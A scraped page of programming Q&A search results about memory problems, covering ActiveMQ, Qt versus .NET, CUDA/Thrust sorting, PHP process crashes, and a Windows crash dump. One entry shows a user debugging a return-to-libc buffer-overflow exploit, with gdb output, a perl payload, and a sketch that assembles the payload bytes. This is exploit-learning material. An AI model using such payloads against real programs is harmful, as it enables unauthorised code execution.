Search Results

Search found 12267 results on 491 pages for 'out of memory'.


  • ActiveMQ 5.2.0 + REST + HTTP POST = java.lang.OutOfMemoryError

    - by Bruce Loth
    First off, I am a newbie when it comes to JMS & ActiveMQ. I have been looking into a messaging solution to serve as middleware for a message producer that will insert XML messages into a queue via HTTP POST. The producer is an existing system written in C++ that cannot be modified (so Java and the C++ API are out). Using the "demo" examples and some trial and error, I have cobbled together a working example of what I want to do (on a Windows box). The web.xml I configured in a test directory under "webapps" specifies that the HTTP POST messages received from the producer are to be handled by the MessageServlet. I added a line for the test app in "activemq.xml" ('ow' is the test app dir). I created a test script to "insert" messages into the queue, which works well.

    The problem I am running into is that as I continue to insert messages via REST/HTTP POST, the memory consumption and thread count used by ActiveMQ continue to rise (it happens when I have timely consumers as well as slow or non-existent consumers). When memory consumption gets to around 250 MB and the thread count exceeds 5000 (as shown in Windows Task Manager), ActiveMQ crashes and I see this in the log:

        Exception in thread "ActiveMQ Transport Initiator: vm://localhost#3564" java.lang.OutOfMemoryError: unable to create new native thread

    It is as if Jetty is spawning a new thread to handle each HTTP POST and the thread never dies. I did look at this page: http://activemq.apache.org/javalangoutofmemory.html and tried it, but that didn't fix the problem (although I didn't fully understand the implications of the change either). Does anyone have any ideas? Thanks! Bruce Loth

    PS - I included the "test message producer" Python script below for what it is worth. I created batches of 100 messages and continued to run the script manually from the command line while watching the memory consumption and thread count of ActiveMQ in Task Manager.

        def foo():
            import httplib, urllib
            body = "<?xml version='1.0' encoding='UTF-8'?>\n \
                    <ROOT>\n \
                    [snip: xml deleted to save space] </ROOT>"
            headers = {"content-type": "text/xml",
                       "content-length": str(len(body))}
            conn = httplib.HTTPConnection("127.0.0.1:8161")
            conn.request("POST", "/ow/message/RDRCP_Inbox?type=queue", body, headers)
            response = conn.getresponse()
            print response.status, response.reason
            data = response.read()
            conn.close()
        ## end method definition

        ## Begin test code
        count = 0
        while (count < 100):   # Test with batches of 100 msgs
            count += 1
            foo()


  • Qt vs. .NET - REAL comparisons for R.A.D. projects

    - by Pirate for Profit
    Man, in all these Qt vs. .NET discussions, 90% of these people argue about the dumbest crap. I'm trying to get a real comparison chart here, because I know a little about both frameworks but I don't know everything. I believe Qt and .NET both have strengths and weaknesses. This is to make a comparison that highlights these so people can make more informed decisions before embarking on a project, in the spirit of R.A.D.

    Event Handling
    In Qt the event handling system is very simple. You just emit signals when something cool happens and then catch them in slots, e.g. // run some calculations, then emit valueChanged(30, false, 20.2); and then catching it: any object can make a slot to receive that message easily, void MyObj::valueChanged(int percent, bool ok, float timeRemaining). It's easy to "block" an event or "disconnect" when needed, and it works seamlessly across threads... once you get the hang of it, it just seems a lot more natural and intuitive than the way the .NET event handling is set up (you know, void valueChanged(object sender, CustomEventArgs e)). And I'm not just talking about syntax, because in the end the .NET anonymous delegates are the bomb. I'm also talking about more than just reflection (because, yes, .NET obviously has much stronger reflection capabilities). I'm talking about the way the system feels to a human being. Qt wins hands down for the simplest yet still flexible event handling system ever, IMO.

    Plugins and such
    I do love some of the ease of C# compared to C++, as well as .NET's assembly architecture, even though it leads to a bunch of .dll's (there are ways to combine everything into a single exe though). That is a big bonus for modular projects, which are a PITA to import stuff into in C++ as far as RAD is concerned.

    Database Ease of Doing Crap
    Also, what about datasets and database manipulations? I think .NET wins here but I'm not sure.

    Threading/Concurrency
    What do you guys think of the threading? In .NET, all I've ever done is make a list of master worker threads with locks. I like the QtConcurrent framework: you don't worry about locks or anything, and with the ease of the signal/slot system across threads it's nice to get notified about the progress of things. QtConcurrent is the simplest threading mechanism I've ever played with.

    Memory Usage
    Also, what do you think of the overall memory usage comparison? Is the .NET garbage collector pretty on the ball and quick compared to the instantaneous nature of native memory management? Or does it just let programs leak up a storm and lag the computer, then clean it up when it's about to really lag? Doesn't the just-in-time compiler produce native code that is pretty good, and doesn't that only happen the first time the program is run? However, I am a n00b who doesn't know what I'm talking about; please school me on the subject.
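
    To make the Event Handling paragraph above concrete, here is a minimal, self-contained sketch of the Qt signal/slot wiring being described. The class names and the "progress" numbers are invented for illustration, and it assumes a Qt 5 build where moc runs over this file (qmake or CMake with automoc):

        #include <QCoreApplication>
        #include <QObject>
        #include <QDebug>

        // Hypothetical worker that reports progress through a signal.
        class Worker : public QObject {
            Q_OBJECT
        public:
            void run() {
                for (int i = 1; i <= 3; ++i)
                    emit valueChanged(i * 30, true, 10.0f - i * 3.0f);
            }
        signals:
            void valueChanged(int percent, bool ok, float timeRemaining);
        };

        // Hypothetical receiver; any QObject can declare a matching slot.
        class Monitor : public QObject {
            Q_OBJECT
        public slots:
            void valueChanged(int percent, bool ok, float timeRemaining) {
                qDebug() << percent << "%" << ok << timeRemaining << "s left";
            }
        };

        int main(int argc, char *argv[]) {
            QCoreApplication app(argc, argv);
            Worker worker;
            Monitor monitor;
            // One line of wiring; disconnect() or blockSignals() can undo/suspend it.
            QObject::connect(&worker, &Worker::valueChanged,
                             &monitor, &Monitor::valueChanged);
            worker.run();
            return 0;
        }

        #include "main.moc"  // assumes this file is main.cpp and moc is run on it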


  • Problem with return-to-libc method

    - by jth
    Hi, I'm trying to understand the return-to-libc method. I'm using Ubuntu Linux 9.10, 32-bit, with ASLR disabled. In theory, it sounds quite easy: overwrite the saved eip with the address of system() (or whatever function you want), then put the address to which system() should return, and after that the parameter for system, the "/bin/bash" string. But what happens is that my exploit keeps segfaulting the vulnerable program. I assume something with the system() address went wrong. This is what I did so far.

    Determined the address of system():

        (gdb) print system
        $1 = {<text variable, no debug info>} 0x167020 <system>
        (gdb) x/x system
        0x167020 <system>: 0x890cec83

    I used the subsequent x/x system because those 3 bytes returned by print system look like an index into some sort of jump table (PLT?), so I assume 0x890cec83 is the right address to use to overwrite the saved eip.

    After that I determined the address of the /bin/bash string in memory, using a small C program which basically consists of this line:

        printf("Address of string /bin/bash: %p\n", getenv("SHELL"));

    Then I looked around a little bit in memory and found /bin/bash:

        (gdb) x/s 0xbffff6ca
        0xbffff6ca: "/bin/bash"

    After I gathered this information, I filled the buffer:

        (gdb) b 9
        Breakpoint 1 at 0x8048407: file victim.c, line 9.
        (gdb) r `perl -e 'print "A"x9 . "\x83\xec\x0c\x89FAKE\xca\xf6\xff\xbf";'`
        Breakpoint 1, main (argc=1111638594, argv=0xc360cca) at victim.c:10
        10      return 0;
        (gdb) x/s 0xbffff6ca
        0xbffff6ca: "/bin/bash"

    The stack frame looks like this:

        (gdb) i f
        Stack level 0, frame at 0xbffff440:
        eip = 0x8048407 in main (victim.c:10); saved eip 0x890cec83
        source language c.
        Arglist at 0xbffff438, args: argc=1111638594, argv=0xc360cca
        Locals at 0xbffff438, Previous frame's sp is 0xbffff440
        Saved registers:
        ebp at 0xbffff438, eip at 0xbffff43c

    This seems all right to me: the saved eip was overwritten with the (hopefully) correct system() address, the return address for system was set to "FAKE" (shouldn't matter), and the address of /bin/bash also seems to be correct. When I continue execution, victim segfaults on some strange address and certainly not at 0x890cec83:

        (gdb) cont
        Continuing.
        Program received signal SIGSEGV, Segmentation fault.
        0x0804840d in main (argc=Cannot access memory at address 0x41414149) at victim.c:11
        11      }

    Does anyone have an explanation or a hint as to what happens here and why the execution isn't redirected to 0x890cec83? Thanks in advance; any hint, even a vague one, would be appreciated. I have no idea why this doesn't work.
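
    For reference, a minimal sketch of how the classic return-to-libc payload layout described above is usually assembled. The addresses are placeholders standing in for whatever gdb reports on a given system; this is only an illustration of the layout, not a statement about the values used in the question:

        #include <cstdint>
        #include <cstring>
        #include <cstdio>

        int main() {
            // Placeholder addresses: in practice these come from gdb
            // ("print system" and the location of the "/bin/bash" string).
            uint32_t system_addr = 0x00167020;  // address of system() in libc
            uint32_t fake_ret    = 0x41414141;  // where system() "returns"; value does not matter
            uint32_t binsh_addr  = 0xbffff6ca;  // address of the "/bin/bash" string

            // Layout: padding up to the saved eip, then [system][fake ret][argument].
            unsigned char payload[9 + 3 * sizeof(uint32_t)];
            std::memset(payload, 'A', 9);
            std::memcpy(payload + 9,  &system_addr, 4);  // overwrites the saved eip
            std::memcpy(payload + 13, &fake_ret,    4);  // return address as seen by system()
            std::memcpy(payload + 17, &binsh_addr,  4);  // single argument passed to system()

            // memcpy of a uint32_t on x86 writes the bytes little-endian,
            // which is the order the stack expects.
            std::fwrite(payload, 1, sizeof(payload), stdout);
            return 0;
        }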


  • Qt vs .NET - a few comparisons [closed]

    - by Pirate for Profit
    Event Handling
    In Qt's event handling system, you just emit signals when something cool happens and then catch them in slots, for instance emit valueChanged(int percent, bool something); and void MyCatcherObj::valueChanged(int p, bool ok){}, blocking them and disconnecting them when needed, doing it across threads... once you get the hang of it, it just seems a lot more natural and intuitive than the way the .NET event handling is set up (you know, object sender, CustomEventArgs e). And I'm not just talking about syntax, because in the end the .NET delegate crap is the bomb. I'm also talking about more than just reflection (because, yes, .NET obviously has much stronger reflection capabilities). I'm talking about the way the system feels to a human being. Qt wins hands down, IMO. Basically, the footprints make more sense and you can visualize the project more easily without the clunky event handling system. I wish I could explain it better.

    The only thing is, I do love some of the ease of C# compared to C++, and .NET's assembly architecture. That is a big bonus for modular projects, which are a PITA to do in C++.

    Database Ease of Doing Crap
    Also, what about datasets and database manipulations? I think .NET wins here but I'm not sure.

    Threading/Concurrency
    What do you guys think of the threading? In .NET, all I've ever done is make a list of master worker threads with locks. I like the QtConcurrent framework: you don't worry about locks or anything, and with the ease of the signal/slot system across threads it's nice to get notified about the progress of things.

    Memory Usage
    Also, what do you think of the overall memory usage comparison? Is the .NET garbage collector pretty on the ball and quick compared to the instantaneous nature of native memory management? Or does it just let programs leak up a storm and lag the computer, then clean it up when it's about to really lag? However, I am a n00b who doesn't know what I'm talking about; please school me on the subject.
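
    Since the threading paragraph above leans on QtConcurrent, here is a minimal sketch of the kind of usage being described. The worker function and watcher wiring are invented for illustration, and it assumes the Qt Concurrent module is linked and a Qt event loop is running so the finished() signal gets delivered:

        #include <QtConcurrent/QtConcurrent>
        #include <QFutureWatcher>
        #include <QObject>
        #include <QDebug>

        // Hypothetical long-running computation (not from the question).
        static int countPrimesBelow(int limit) {
            int count = 0;
            for (int n = 2; n < limit; ++n) {
                bool prime = true;
                for (int d = 2; d * d <= n; ++d)
                    if (n % d == 0) { prime = false; break; }
                if (prime) ++count;
            }
            return count;
        }

        void startWork(QObject *parent) {
            auto *watcher = new QFutureWatcher<int>(parent);
            // finished() is delivered through the event loop of the thread that
            // owns the watcher, so the receiver needs no explicit locking.
            QObject::connect(watcher, &QFutureWatcher<int>::finished, [watcher]() {
                qDebug() << "primes found:" << watcher->result();
                watcher->deleteLater();
            });
            // QtConcurrent::run hands the call to a thread from the global pool.
            watcher->setFuture(QtConcurrent::run(countPrimesBelow, 1000000));
        }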


  • Google Toolbox For Mac with Core Data on iPhone results in error

    - by JaanusSiim
    I have set up my project to use Google Toolbox for Mac as described on the official wiki, and everything is working as expected. For Core Data usage I have created a 'database' class that, in the final application, uses SQLite storage (this is done based on Xcode template code). For unit tests I have created a separate init method for the 'database' that uses in-memory storage (the storage URL is [NSURL URLWithString:@"memory://store"] and the type is NSInMemoryStoreType). Without adding my model file (*.xcdatamodel) to the unit test target, the test fails at the expected place with the message: executeFetchRequest:error: A fetch request must have an entity. If I add the model file to the test target, then the test executes as expected (the Core Data part looks OK), but after the tests execute I get: RunIPhoneUnitTest.sh: line 123: 9487 Segmentation fault "$TARGET_BUILD_DIR/$EXECUTABLE_PATH" -RegisterForSystemEvents Command /bin/sh failed with exit code 139. This problem does not look directly related to Core Data, but it only happens if the model file is added to the target. Any pointers on resolving this issue would be appreciated!


  • binary search and trie

    - by user121196
    Given a large list of alphabetically sorted words in a file, I need to write a program that, given a word x, determines whether x is in the list. Priorities: 1. speed, 2. memory.
    I already know I can use (n is the number of words, m is the average length of the words):
    1. a trie: time is O(log(n)), space (best case) is O(log(n*m)), space (worst case) is O(n*m).
    2. load the complete list into memory, then binary search: time is O(log(n)), space is O(n*m).
    I'm not sure about the complexity of the trie, please correct me if it is wrong. Also, are there other good approaches?
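
    A minimal sketch of the second approach described above (load the whole sorted list into memory, then binary search), assuming one word per line in the input file; the program and file names are illustrative:

        #include <algorithm>
        #include <fstream>
        #include <iostream>
        #include <string>
        #include <vector>

        int main(int argc, char **argv) {
            if (argc < 3) {
                std::cerr << "usage: lookup <sorted-wordlist> <word>\n";
                return 1;
            }
            // Load the complete (already sorted) list into memory: O(n*m) space.
            std::vector<std::string> words;
            std::ifstream in(argv[1]);
            for (std::string line; std::getline(in, line); )
                words.push_back(line);

            // Binary search: O(log n) comparisons, each comparing up to O(m) characters.
            bool found = std::binary_search(words.begin(), words.end(),
                                            std::string(argv[2]));
            std::cout << (found ? "found\n" : "not found\n");
            return 0;
        }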


  • While loop in IL - why stloc.0 and ldloc.0?

    - by Michael Stum
    I'm trying to understand how a while loop looks in IL. I have written this C# function:

        static void Brackets()
        {
            while (memory[pointer] > 0)
            {
                // Snipped body of the while loop, as it's not important
            }
        }

    The IL looks like this:

        .method private hidebysig static void Brackets() cil managed
        {
            // Code size 37 (0x25)
            .maxstack 2
            .locals init ([0] bool CS$4$0000)
            IL_0000: nop
            IL_0001: br.s IL_0012
            IL_0003: nop
            // Snipped body of the while loop, as it's not important
            IL_0011: nop
            IL_0012: ldsfld uint8[] BFHelloWorldCSharp.Program::memory
            IL_0017: ldsfld int16 BFHelloWorldCSharp.Program::pointer
            IL_001c: ldelem.u1
            IL_001d: ldc.i4.0
            IL_001e: cgt
            IL_0020: stloc.0
            IL_0021: ldloc.0
            IL_0022: brtrue.s IL_0003
            IL_0024: ret
        } // end of method Program::Brackets

    For the most part this is really simple, except for the part after cgt. What I don't understand is the local [0] and the stloc.0/ldloc.0. As far as I see it, cgt pushes the result to the stack, stloc.0 gets the result from the stack into the local variable, ldloc.0 pushes the result to the stack again and brtrue.s reads from the stack. What is the purpose of doing this? Couldn't this be shortened to just cgt followed by brtrue.s?


  • Server configuration problem: a PHP script just dies with no error log and no reason

    - by Roberto
    Hi (first of all, thanks for your attention and sorry for my bad English. Also, I don't think this is a programming error; I think it is an error in some configuration of the server or something else, but I don't know what).

    I have a PHP script (running as a Linux process, not in the web browser) that sends SMS via SMPP on port 2055 (using sockets in PHP) and then inserts about 10,000 rows into a MySQL database; the script gets the data from an XML file. At first it was running on a shared server (Hostgator is our hosting provider) and in the beginning it worked fine, with no trouble, but 5 months later an error appeared: the process just dies with no reason. The script had only sent and inserted 700 rows into the table, the process didn't show any warning or error, nothing appears in the error logs, and I didn't make any change to the script.

    Hostgator never helped us, so we decided to move the script from the shared server to a dedicated server. I thought it was a memory problem or something like that, but when we moved the script to the dedicated server the problem just got worse: the script dies when it has sent and inserted only 40 to 50 rows into the database.

    Some information about this error:
    - the shared server is on Red Hat 4.1.2-46 and the dedicated server is on CentOS 5.4
    - I have commented out the line that sends the SMS, and the problem remains. On the shared server the script at first died after inserting about 700 rows, and now it dies after inserting 2500 rows; that's better, but we didn't change anything. On the dedicated server, the script dies after inserting about 40 rows into the table.
    - before it dies, the script changes to a zombie process and we don't know why
    - the memory usage appears to be 0.3%, and the CPU usage appears to be 0.7% to 1%
    - I have changed the max memory limit of PHP to 128 MB, and even to -1 (so PHP won't have any limit), but the problem remains
    - we have a limit of 50 simultaneous MySQL connections, so I don't think that is the problem
    - I'm using mysqli to connect from PHP to MySQL
    - Hostgator reports that they haven't made any change or update to the servers

    What could be the problem? What should I do? What should I search for? Is there something in the logic I'm missing? What steps do I have to follow when managing and debugging problems with processes on Linux? Thank you very much. I think this is not a programming problem, but you have more experience than me, so you can tell me. Thanks!!! Bye!!! :)


  • How/is data shared between fastCGI processes?

    - by Josh the Goods
    I've written a simple Perl script that I'm running via FastCGI on Apache. The application loads a set of XML data files which are used to look up values based upon the query parameters of an incoming request. As I understand it, if I want to increase the number of concurrent requests my application can handle, I need to allow FastCGI to spawn multiple processes. Will each of these processes have to hold a duplicate copy of the XML data in memory? Is there a way to set things up so that I can have one copy of the XML data loaded in memory while increasing the capacity to handle concurrent requests?


  • Penalty of using QGraphicsObject vs QGraphicsItem?

    - by Dutch
    I currently have a hierarchy of items based on QGraphicsItem. I want to move to QGraphicsObject instead so that I can put properties on my items. I will not be making use of signals/slots or any other features of QObject. I'm told that you shouldn't derive from QObject because it's "heavy" and "slow". To test the impact, I derive from QGraphicsObject, add a couple of properties to my items, and look at the memory usage of the running app. I create 1000 items using both flavors and I don't notice anything more than 10k more memory usage. Since all I am adding to my items are properties, is it safe to say that QObject only adds weight if you are using signals/slots?
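
    For illustration, a minimal sketch of the kind of item the question describes: deriving from QGraphicsObject purely to expose a property, without using signals/slots. The class name and property are invented, and the Q_OBJECT macro assumes the file is processed by moc:

        #include <QGraphicsObject>
        #include <QPainter>
        #include <QStyleOptionGraphicsItem>

        // Hypothetical item that only wants Q_PROPERTY support.
        class NodeItem : public QGraphicsObject {
            Q_OBJECT
            Q_PROPERTY(qreal weight READ weight WRITE setWeight)
        public:
            explicit NodeItem(QGraphicsItem *parent = nullptr)
                : QGraphicsObject(parent), m_weight(1.0) {}

            qreal weight() const { return m_weight; }
            void setWeight(qreal w) { m_weight = w; update(); }

            QRectF boundingRect() const override { return QRectF(-10, -10, 20, 20); }
            void paint(QPainter *p, const QStyleOptionGraphicsItem *, QWidget *) override {
                p->drawEllipse(boundingRect());   // trivial visual, just to be complete
            }

        private:
            qreal m_weight;
        };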


  • iPhone App Similar to the Talking Larry Application

    - by Zeeshan
    I am developing an iPhone application similar to the Talking Larry application. I am facing a low-memory issue when I pre-load the animations into an NSMutableArray. If I do not pre-load the animations and instead load them into the animation images when the user touches the button, then it takes time and the animation plays back very slowly, and while recording video it does not play the complete animations. How can I resolve this issue? I want to play back the animations the way the Talking Larry app does, without getting the low-memory issue.


  • Question about "Link Map" output and "Assume" directive of MASM assembler.

    - by smwikipedia
    I am new to MASM, so the questions may be quite basic. When I am using the MASM assembler, there's an output file called a "Link Map". Its content is composed of the starting offset and length of various segments, such as the data segment, code segment and stack segment. I am wondering what this information is describing. Is it talking about how the various segments are located within the EXE file, or how the segments are located within memory after the EXE file has been loaded into memory by the program loader? BTW: what does the "Assume" directive do? My understanding is that it tells the assembler to emit some information into the EXE file header so the program loader can use it to set the DS, CS, SS and ES registers accordingly. Am I right on this? Thanks in advance.


  • Is it possible to implement a GC.GetAliveInstancesOf<T>() (for use in debugging)?

    - by Omer Raviv
    Hi, I know this was answered before, but I'd like to pose a somewhat different question. Is there any conceivable way to implement GC.GetAliveInstancesOf() that can be evaluated in the Visual Studio debug Watch window? Sasha Goldstein shows one solution in this article, but it requires that every class you want to query inherit from a specific base class. I'll emphasize that I only want to use this method during debugging, so I don't care that the GC may change an object's address in memory during runtime. One idea might be to somehow harness the !dumpheap -type command of SOS, and do some magic trick to create a temporary variable and have it point to the memory address printed by SOS. Does anyone have a solution that works?


  • Where to start when programming process synchronization algorithms like clone/fork, semaphores

    - by David
    I am writing a program that simulates process synchronization. I am trying to implement the fork and semaphore techniques in C++, but I am having trouble starting off. Do I just create a process and have it fork from the very beginning? Is the program just going to be one infinite loop that goes back and forth between parent/child processes? And how do you create the idea of 'shared memory' in C++: an explicit memory address or just some global variable? I just need to get the overall structure/idea of the flow of the program. Any references would be appreciated.
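
    As one possible starting point, here is a minimal sketch (POSIX calls, compiled as C++ on Linux with -pthread) of a parent and child sharing a counter through an anonymous mmap'd region, with a process-shared semaphore guarding it. The struct layout and the counting task are invented for illustration, and error handling is omitted:

        #include <sys/mman.h>
        #include <sys/types.h>
        #include <sys/wait.h>
        #include <semaphore.h>
        #include <unistd.h>
        #include <cstdio>

        struct Shared {
            sem_t lock;   // process-shared semaphore
            int counter;  // data both processes update
        };

        int main() {
            // Anonymous shared mapping: visible to both parent and child after fork().
            void *mem = mmap(nullptr, sizeof(Shared), PROT_READ | PROT_WRITE,
                             MAP_SHARED | MAP_ANONYMOUS, -1, 0);
            Shared *sh = static_cast<Shared *>(mem);
            sem_init(&sh->lock, /*pshared=*/1, /*value=*/1);
            sh->counter = 0;

            pid_t pid = fork();
            for (int i = 0; i < 100000; ++i) {
                sem_wait(&sh->lock);      // enter critical section
                ++sh->counter;
                sem_post(&sh->lock);      // leave critical section
            }
            if (pid != 0) {               // parent: wait for the child, then report
                wait(nullptr);
                std::printf("counter = %d (expected 200000)\n", sh->counter);
                sem_destroy(&sh->lock);
                munmap(mem, sizeof(Shared));
            }
            return 0;
        }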


  • Programmatic resource monitoring per process in Linux

    - by tuxx
    Hi, I want to know if there is an efficient solution for monitoring a process's resource consumption (CPU, memory, network bandwidth) in Linux. I want to write a daemon in C++ that does this monitoring for some given PIDs. From what I know, the classic solution is to periodically read the information from /proc, but this doesn't seem like the most efficient way (it involves many system calls). For example, to monitor the memory usage every second for 50 processes, I have to open, read and close 50 files (that means 150 system calls) every second from /proc. Not to mention the parsing involved when reading these files. Another problem is the network bandwidth consumption: this cannot be easily computed for each process I want to monitor. The solution adopted by NetHogs involves a pretty high overhead in my opinion: it captures and analyzes every packet using libpcap, then for each packet the local port is determined and searched in /proc to find the corresponding process. Do you know of more efficient alternatives to the methods presented here, or any libraries that deal with these problems?
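
    For reference, a minimal sketch of the classic /proc polling approach mentioned above: sampling the resident memory of one PID by parsing /proc/<pid>/statm. The helper name is invented; the field meanings follow proc(5):

        #include <fstream>
        #include <iostream>
        #include <string>
        #include <unistd.h>

        // Returns the resident set size in bytes for the given pid, or -1 on error.
        long residentBytes(pid_t pid) {
            std::ifstream statm("/proc/" + std::to_string(pid) + "/statm");
            long sizePages = 0, residentPages = 0;
            if (!(statm >> sizePages >> residentPages))
                return -1;
            // statm reports page counts; convert using the system page size.
            return residentPages * sysconf(_SC_PAGESIZE);
        }

        int main(int argc, char **argv) {
            pid_t pid = (argc > 1) ? std::stoi(argv[1]) : getpid();
            std::cout << "RSS of " << pid << ": " << residentBytes(pid) << " bytes\n";
            return 0;
        }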


  • create a list of threads in C

    - by Hristo
    My implementation (in C) isn't working... the first node is always NULL so I can't free the memory. I'm doing:

        thread_node_t *thread_list_head = NULL; // done in the beginning of the program
        ...
        // later on in the program
        thread_node_t *thread = (thread_node_t*) malloc(sizeof(thread_node_t));
        pthread_create(&(thread->thread), NULL, client_thread, &csFD);
        thread->next = thread_list_head;
        thread_list_head = thread;

    So when I try to free this memory, thread_list_head is NULL.

        while (thread_list_head != NULL) {
            thread_node_t *temp = thread_list_head;
            thread_list_head = thread_list_head->next;
            free(temp);
            temp = NULL;
        }

    Any advice on how to fix this, or just a new way to create this list that would work better? Thanks, Hristo


  • Some basic COM question...

    - by smwikipedia
    I have just finished my first COM server DLL and it runs smoothly. So I'd like to lay out my current understanding and hear your critiques.
    1 - How does COM work, simply? COM - "The Call Chain": COM library methods - traditional DLL exports - classes encapsulated in the COM DLL.
    2 - With C++, the benefits like "interface" in OOP can only be taken advantage of at the source level. With COM, these benefits can be used at the binary level.
    3 - Some illustration of an interface:

        &pInterface (Ixx **) ------- pInterface (Ixx *) ---------- Interface (method table) ----------------- methods (void **)

    An interface is a data structure in memory. It's nothing but a memory area containing a method table. Is my understanding all right? Thanks for your revision.
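
    To make point 3 concrete, here is a minimal C++ sketch of what an interface pointer refers to: an abstract class whose objects begin with a pointer to a table of function pointers. The interface and class names are invented and this is not a real COM interface, just the shape of one:

        #include <cstdio>

        // In C++ terms, a COM-style interface is an abstract class with only pure
        // virtual methods; the compiler lays each object out as a pointer to a
        // method table (vtable) followed by the object's own data.
        struct ICalculator {
            virtual int  Add(int a, int b) = 0;
            virtual void Release() = 0;
        };

        // The coclass that actually implements the interface, hidden inside the DLL.
        class Calculator : public ICalculator {
        public:
            int Add(int a, int b) override { return a + b; }
            void Release() override { delete this; }
        };

        // What a client sees: only an ICalculator*, never the concrete class.
        int main() {
            ICalculator *pInterface = new Calculator();   // loosely comparable to CoCreateInstance handing back an Ixx*
            std::printf("%d\n", pInterface->Add(2, 3));   // call dispatched through the method table
            pInterface->Release();
            return 0;
        }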


  • cuda/thrust: Trying to sort_by_key 2.8GB of data in 6GB of gpu RAM throws bad_alloc

    - by Sven K
    I have just started using thrust and one of the biggest issues I have so far is that there seems to be no documentation as to how much memory operations require. So I am not sure why the code below is throwing bad_alloc when trying to sort (before the sorting I still have 50% of GPU memory available, and I have 70GB of RAM available on the CPU) -- can anyone shed some light on this?

        #include <thrust/device_vector.h>
        #include <thrust/sort.h>
        #include <thrust/random.h>

        void initialize_data(thrust::device_vector<uint64_t>& data) {
          thrust::fill(data.begin(), data.end(), 10);
        }

        #define BUFFERS 3

        int main(void) {
          size_t N = 120 * 1024 * 1024;
          char line[256];
          try {
            std::cout << "device_vector" << std::endl;
            typedef thrust::device_vector<uint64_t> vec64_t;
            // Each buffer is 900MB
            vec64_t c[3] = {vec64_t(N), vec64_t(N), vec64_t(N)};
            initialize_data(c[0]);
            initialize_data(c[1]);
            initialize_data(c[2]);
            std::cout << "initialize_data finished... Press enter";
            std::cin.getline(line, 0);
            // nvidia-smi reports 48% memory usage at this point (2959MB of 6143MB)
            std::cout << "sort_by_key col 0" << std::endl;
            // throws bad_alloc
            thrust::sort_by_key(c[0].begin(), c[0].end(),
                thrust::make_zip_iterator(thrust::make_tuple(c[1].begin(), c[2].begin())));
            std::cout << "sort_by_key col 1" << std::endl;
            thrust::sort_by_key(c[1].begin(), c[1].end(),
                thrust::make_zip_iterator(thrust::make_tuple(c[0].begin(), c[2].begin())));
          } catch(thrust::system_error &e) {
            std::cerr << "Error: " << e.what() << std::endl;
            exit(-1);
          }
          return 0;
        }


  • Texture allocations being doubled in iPhone OpenGL ES

    - by Kyle
    The below couple of lines are called 15 times during initialization. The tx-size is reported as 512 every time, so this will allocate a 1 MB image in memory 15 times, for a total of 15 MB used. However, I noticed Instruments is reporting a total of 31 allocations! (15*2)+1

        glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, tx-size, tx-size, 0, GL_RGBA, GL_UNSIGNED_BYTE, spriteData);
        free(spriteData);

    Likewise, in another area of my program that allocates 6 256x256x4 (256 kB) textures, I see 13 sitting there. (6*2)+1 Anyone know what's going on here? It seems like awful memory management, and I really hope it's my fault. Just to let everyone know, I'm on the simulator.


  • CUDA threads output different values

    - by kar
    Hi, I wrote a CUDA program; I have given the kernel function below. The device memory is allocated through cudaMalloc(); the value of *md is 10.

        __global__ void add(int *md)
        {
            int x, oper = 2;
            x = threadIdx.x;
            *md = *md * oper;
            if (x == 1) { *md = *md * 0;  }
            if (x == 2) { *md = *md * 10; }
            if (x == 3) { *md = *md + 1;  }
            if (x == 4) { *md = *md - 1;  }
        }

    I executed the above code as add<<<1,5>>>(*md) and add<<<1,4>>>(*md). For <<<1,5>>> the output is 19; for <<<1,4>>> the output is 21.
    1) I have a doubt: will cudaMalloc() allocate in device main memory?
    2) Why is the last thread alone always executed in the above program?
    Thank you


  • Server 2003 SP2 BSOD caused by fltmgr.sys

    - by MasterMax1313
    I'm running into a problem where a Server 2003 SP2 box has started crashing roughly once an hour, BSODing out with the message that fltmgr.sys is probably the cause. I ran dumpchk.exe on the memory.dmp file, indicating the same thing. Any thoughts on typical root causes? The following is the error code I'm seeing: Error code 0000007e, parameter1 c0000005, parameter2 f723e087, parameter3 f78cea8c, parameter4 f78ce788. After running dumpchk on the memory.dmp file, I get the following note: Probably caused by : fltmgr.sys ( fltmgr!FltGetIrpName+63f ) The full log is here: Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [c:\windows\memory.dmp] Kernel Complete Dump File: Full address space is available Symbol search path is: *** Invalid *** **************************************************************************** * Symbol loading may be unreliable without a symbol search path. * * Use .symfix to have the debugger choose a symbol path. * * After setting your symbol path, use .reload to refresh symbol locations. * **************************************************************************** Executable search path is: ********************************************************************* * Symbols can not be loaded because symbol path is not initialized. * * * * The Symbol Path can be set by: * * using the _NT_SYMBOL_PATH environment variable. * * using the -y <symbol_path> argument when starting the debugger. * * using .sympath and .sympath+ * ********************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntkrnlpa.exe - Windows Server 2003 Kernel Version 3790 (Service Pack 2) UP Free x86 compatible Product: Server, suite: TerminalServer SingleUserTS Built by: 3790.srv03_sp2_gdr.101019-0340 Machine Name: Kernel base = 0x80800000 PsLoadedModuleList = 0x8089ffa8 Debug session time: Wed Oct 5 08:48:04.803 2011 (UTC - 4:00) System Uptime: 0 days 14:25:12.085 ********************************************************************* * Symbols can not be loaded because symbol path is not initialized. * * * * The Symbol Path can be set by: * * using the _NT_SYMBOL_PATH environment variable. * * using the -y <symbol_path> argument when starting the debugger. * * using .sympath and .sympath+ * ********************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntkrnlpa.exe - Loading Kernel Symbols ............................................................... ................................................. Loading User Symbols Loading unloaded module list ... ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 7E, {c0000005, f723e087, f78dea8c, f78de788} ***** Kernel symbols are WRONG. Please fix symbols to do analysis. *** ERROR: Symbol file could not be found. 
